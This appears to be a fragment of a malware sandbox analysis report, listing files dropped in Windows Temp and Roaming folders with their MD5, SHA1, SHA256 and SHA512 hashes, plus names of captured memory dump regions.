C:\Users\Admin\AppData\Local\Temp\RESA4CB.tmp
| MD5 | 2d21d8417094ab97e94c9f60ce27fc7d |
| SHA1 | 66870f88c40ba0c154b3518c99e6b4298808316d |
| SHA256 | 5564ec882a334d322e76632e411a30f6a577510b9bfeac8ceaabd7081eb83948 |
| SHA512 | 3e624ee3e7bbef6beab56037e75d1a92960f603a6c471573a67e61c01ba090ef9514250e2d62bdfba9871a7688560019dcf7ef2c2a7489b893a1aead7d5cf143 |
C:\Users\Admin\AppData\Local\Temp\bbguofy5\bbguofy5.dll
| MD5 | 9222ea97a6a4babf39f94c32fa9b723d |
| SHA1 | fd757ce846b7dcfa2008189a71f0e5398ecee87e |
| SHA256 | f952e3d89de32eccefefd74061abaa008a6f024ef6ce779e619be81934881903 |
| SHA512 | f57f0e1e9f0ac5c721bbd831a7993d764dfdcae44e51520558ca0100b7a2f044417bf80bc0267c098ef9e24617eb366d9c9b80351bb1d5a57a089a698cb4df6d |
memory/3524-61-0x00000248575D0000-0x00000248575D8000-memory.dmp
memory/2040-65-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-66-0x00007FFA1DA0D000-0x00007FFA1DA0E000-memory.dmp
memory/2040-67-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-71-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
memory/2040-72-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 3a4acf7da177d06f82f53dbc70c96f08 |
| SHA1 | 39767071696d5e757e6a73cce0beb472eefce10a |
| SHA256 | 2e7f0882f7a64145e976d3a194e6dd5fd77227c259b43a05360e9d7bc655e4a7 |
| SHA512 | f928887e91e1405f956477fc9c571788dc83aebd97c2cd23c0bab15b9677323e9051da80d9ca29972d450244a103d03c24d6052961946be87531a0f995fcfc71 |